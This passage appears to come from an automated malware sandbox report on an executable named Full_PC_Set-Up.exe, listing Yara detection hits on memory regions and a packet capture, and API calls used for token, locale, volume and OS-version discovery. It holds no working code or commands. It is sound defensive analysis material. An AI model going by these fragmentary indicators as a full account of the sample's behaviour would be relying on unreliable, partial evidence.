Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Memory protected: page guard |
Jump to behavior |
Source: Yara match |
File source: Process Memory Space: Full_PC_Set-Up.exe PID: 7444, type: MEMORYSTR |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_002C1CA0 AllocateAndInitializeSid,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,FreeSid,GetTokenInformation,GetTokenInformation,_calloc,FreeSid,CloseHandle,GetTokenInformation,EqualSid,FreeSid,CloseHandle, |
0_2_002C1CA0 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: GetLocaleInfoA, |
0_2_0039D105 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Queries volume information: C:\ VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_002DA760 GetFileType,SetFilePointer,GetLocalTime,SystemTimeToFileTime,FileTimeToDosDateTime, |
0_2_002DA760 |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_0038F75F __get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson, |
0_2_0038F75F |
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe |
Code function: 0_2_003D2A00 _memset,GetVersionExW, |
0_2_003D2A00 |
Source: Yara match |
File source: 00000000.00000002.1877669838.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.1878986975.0000000002C60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: Full_PC_Set-Up.exe PID: 7444, type: MEMORYSTR |
Source: Yara match |
File source: dump.pcap, type: PCAP |
Source: Yara match |
File source: 00000000.00000002.1877669838.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.1878986975.0000000002C60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: Full_PC_Set-Up.exe PID: 7444, type: MEMORYSTR |
Source: Yara match |
File source: dump.pcap, type: PCAP |